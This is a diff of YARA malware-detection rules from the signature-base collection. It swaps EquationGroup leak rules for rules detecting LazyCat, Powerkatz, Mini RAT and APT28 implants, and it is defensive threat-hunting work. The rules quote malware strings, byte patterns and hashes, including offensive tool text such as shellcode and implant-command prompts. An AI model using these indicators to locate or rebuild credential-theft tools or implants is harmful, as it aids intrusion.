+		$x2 = ".local_privilege_escalation.rotten_potato" ascii wide
+		$x3 = "LazyCat.Extension" ascii wide
+		$x4 = " MEOWof" ascii wide
+		$x5 = "VirtualSite: {0}, Address: {1:X16}, Name: {2}, Handle: {3:X16}, LogPath: {4}" fullword wide
+		$s1 = "LazyCat" fullword ascii wide
+		$s2 = "$e3ff37f2-85d7-4b24-a385-7eeb1f5a9562"
+		$s3 = "local -> remote {0} bytes"
+		$s4 = "remote -> local {0} bytes"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Banner_Implant9X : FILE
+rule SIGNATURE_BASE_HKTL_Powerkatz_Feb19_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a tool used in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7cbb509e-2a91-5e3c-8d19-61fda797cd8c"
-		date = "2017-04-15"
+		id = "294d6f6c-dbc8-5431-87a0-64abe582c4ea"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2114-L2129"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L137-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bda7b8ab097c0a5ca90b05147d4227e5a03735b99633b5081d80d2d72bceba9"
+		logic_hash = "d1d39d68c5c5a3f6142a966925e2a136e937bc09abddd4080862346683886455"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
+		tags = ""
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$op1 = { c9 c3 57 8d 85 2c eb ff ff }
+		$x1 = "Powerkatz32" ascii wide fullword
+		$x2 = "Powerkatz64" ascii wide
+		$s1 = "GetData: not found taskName" fullword ascii wide
+		$s2 = "GetRes Ex:" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them )
+		1 of ( $x* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Greatdoc_Dll_Config : FILE
+rule SIGNATURE_BASE_HKTL_Unknown_Feb19_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a tool used in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "592e4e40-f5cd-5a11-8a1b-0cdcf6f267ec"
-		date = "2017-04-15"
+		id = "bdcadc4b-8881-5dc7-b203-4e79cbc850ed"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2131-L2147"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L154-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "edb14cc9e51bbf6b3ca2c52f841edfa3df1ca89b3e7c1b5a59baf3a13be0fc46"
+		logic_hash = "231c771ed24106a8daf352a0df1bc2db43ebd8d1108d7fa1162d03d40e738d46"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
+		tags = ""
 
 	strings:
-		$x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
-		$x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
-		$x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii
-		$x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii
+		$x1 = "not a valid timeout format!" ascii wide fullword
+		$x2 = "host can not be empty!" ascii wide fullword
+		$x3 = "not a valid port format!" ascii wide fullword
+		$x4 = "{0} - {1} TTL={2} time={3}" ascii wide fullword
+		$x5 = "ping count is not a correct format!" ascii wide fullword
+		$s1 = "The result is too large,program store to '{0}'.Please download it manully." fullword ascii wide
+		$s2 = "C:\\Windows\\temp\\" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Scanner : FILE
+rule SIGNATURE_BASE_Minirat_Gen_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Mini RAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "603c82d0-2e65-5353-a109-5f69697cffa4"
-		date = "2017-04-15"
+		id = "65d89762-2fd0-5c6a-b706-92d77a03089a"
+		date = "2018-01-22"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2149-L2166"
+		reference = "https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkcaracal.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7f2ee4ac260b78764573187c501ed27fbfdf573e618f15dbd307177afa670605"
+		logic_hash = "53c4ba16ae2c3eb3a6c7371e7fc8b962cfbee5b70abd8267294834eac3e55769"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
+		hash1 = "091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b"
+		hash2 = "b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d"
+		hash3 = "ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2"
+		hash4 = "ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790"
+		hash5 = "675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd"
 
 	strings:
-		$x1 = "+daemon_version,system,processor,refid,clock" fullword ascii
-		$x2 = "Usage: %s typeofscan IP_address" fullword ascii
-		$x3 = "# scanning ip  %d.%d.%d.%d" fullword ascii
-		$x4 = "Welcome to the network scanning tool" fullword ascii
-		$x5 = "***** %s ***** (length %d)" fullword ascii
+		$x1 = "\\Mini rat\\" ascii
+		$x2 = "\\Projects\\ali\\Clever Components v7\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mcl_Ntmemory_Std : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "608218a8-7642-5ec4-8c07-87248649f022"
-		date = "2017-04-15"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "eb3fc39b-08ca-51df-a9b4-7b28b107b700"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2168-L2183"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L12-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d3c76cf0ca0f798e1ca3c0a1b88c3bb425f1c36439842c4c33247dfcb44a877"
-		score = 75
+		logic_hash = "4df04daf70da482877874c530a3ad76fddebec2946931b60f98aa6c4e31f21ae"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
 
 	strings:
-		$op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 }
-		$op2 = { 44 24 33 6f c6 44 24 34 77 c6 }
-		$op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e }
+		$STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0
+         EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56
+         E8 ?? ?? FF FF 59}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Tacothief : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7be7ca05-c2c7-5a7d-8b1b-e6741b4397b9"
-		date = "2017-04-15"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "c7beab50-8e73-5161-be7e-bc3f8351873a"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2185-L2198"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L28-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "565d94ac0dd65de0926d11ae08ee78f14dcb211ca97c77c39f394fb36890fc6f"
-		score = 75
+		logic_hash = "c9bdf38303fadee3e2cfc99b70942a92ab382817a28401e8c8ab8035384c97c1"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
 
 	strings:
-		$x1 = "File too large!  Must be less than 655360 bytes." fullword ascii
+		$STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00
+         00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 }
+		$STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81
+         80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntevt : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd25f703-ff3e-5e75-b1eb-24a658a1ac8e"
-		date = "2017-04-15"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "517133d2-813d-5f44-84c2-a53c62d7a688"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2200-L2219"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L45-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "29572cce9af51adf12db019f885f868fd77ff9034a6944a6286a4d2a0988842a"
-		score = 75
+		logic_hash = "e418620b45bc11804eae24db3cba8421758c214fc9f660a17761bbf3395ad744"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
 
 	strings:
-		$x1 = "c:\\ntevt.pdb" fullword ascii
-		$s1 = "ARASPVU" fullword ascii
-		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
-		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
-		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
+		$rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and $x1 or 3 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Processes_Target : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b910f46-5d19-5ecd-9647-10ee9ee7b012"
-		date = "2017-04-15"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "0362b885-de59-5715-80f2-106e5e91d1fa"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2221-L2236"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L60-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9e26224b7eafc999c9638d4591a45297e3293b0e90e63c2d207ee52848c4ce2"
-		score = 75
+		logic_hash = "eb8e4ed38e2e4d3991543c526c7dc458eec78c517d2c5eaa06a3a3cfb48d770f"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
 
 	strings:
-		$s1 = "Select * from Win32_Process" fullword ascii
-		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
-		$s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide
+		$XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ??
+         ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_St_Lp : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V5 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2d4ee801-c7f4-5476-8368-89aa2863ba96"
-		date = "2017-04-15"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "ac1c6175-3a8b-524b-bb18-243c52f7dba1"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2238-L2254"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L75-L91"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "38a48a931856e0eb8e16b7902f5e494b50f8895d4221b5359fc3339d1b52eb8e"
-		score = 75
+		logic_hash = "e9660dfe76bfe1eb17b434f2ddef4975495e952396212c41550d932dbb8e8205"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
 
 	strings:
-		$x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii
-		$x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii
-		$x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii
-		$x4 = "E: Execute a Command on the Implant" fullword ascii
+		$drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77
+         [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 }
+		$mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C
+         36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Epwrapper : FILE
+rule SIGNATURE_BASE_IMPLANT_1_V7 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "81b72f7f-ba5a-5f45-b77c-071cfb4571d3"
-		date = "2017-04-15"
+		description = "Downrage Implant by APT28"
+		author = "US CERT"
+		id = "2a28273f-d9a1-5e80-bef1-b488eb0326bd"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2256-L2271"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L112-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a1a54cd3fef3db9a20f3be25336fcbabe0d993403f001a04a02b5dbfd629543"
-		score = 75
+		logic_hash = "ff8443460e1818fd63e4dcf678bb592940b32978a70ab1633ebaa61c590d3916"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
 
 	strings:
-		$x1 = "* Failed to get remote TCP socket address" fullword wide
-		$x2 = "* Failed to get 'LPStart' export" fullword wide
-		$s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide
+		$XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_2000 : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "058266d4-8dc5-5a26-9bc6-4c55ac646e9b"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2273-L2290"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L126-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dfcd7d928c921dbe7162712ca74a105a938fd9ac675faaaa228d05139b2077de"
-		score = 75
+		logic_hash = "6708239ea43fd36a7c9431cd2c6c185c0d406d65c4a31374c5e96bdc3e53de43"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
 
 	strings:
-		$s1 = "0M1U1Z1p1" fullword ascii
-		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
-		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
-		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
+		$STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dllload_Target : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9def0814-c86a-5fae-abc2-4185596a74aa"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "747e4f76-b9c4-5988-90ae-b450548b1b82"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2292-L2309"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L140-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab50ad9e01c55b3f40e98e6e2cf77c1ad7d6d6ec81a56bbb2263a6e05912e272"
-		score = 75
+		logic_hash = "ebfedcec6f22d802a9980ad533f21e90b77fe929a813850be1b25304d3973c3b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5"
 
 	strings:
-		$s1 = "BzWKJD+" fullword ascii
-		$op1 = { 44 24 6c 6c 88 5c 24 6d }
-		$op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 }
-		$op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e }
+		$STR1 = {C1 EB 07 8D ?? 01 32 1C ?? 33 D2 }
+		$STR2 = {2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 }
+		$STR3 = {89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D
+         ?? ?? 8D ?? ?? FE }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_EXPA : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V5 : FILE
 {
-	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "106efe9b-f70f-51cf-bbb2-b9bf61df1dd1"
-		date = "2017-04-15"
+	meta:
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "0e787116-d7f5-5a72-9aba-d4e6cb35bc8d"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2311-L2327"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L157-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2aa4ee5b128714cfa7f5d29f7ef110e1b18fb7bc21351444b2472ff74c4139d3"
-		score = 75
+		logic_hash = "b0929b808f62e3c59c0afbe959ebf67a3a985e0a0a72bcb112c9693a98351555"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8"
 
 	strings:
-		$x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii
-		$x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii
-		$x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii
-		$x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii
+		$STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33
+         C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00
+         00 00 48 8B CC E8}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Target : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V6 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "608e5244-2d3f-573c-a0de-44637051f4ba"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "ffadb02f-6311-567d-900b-c8a9ed172ab4"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2329-L2345"
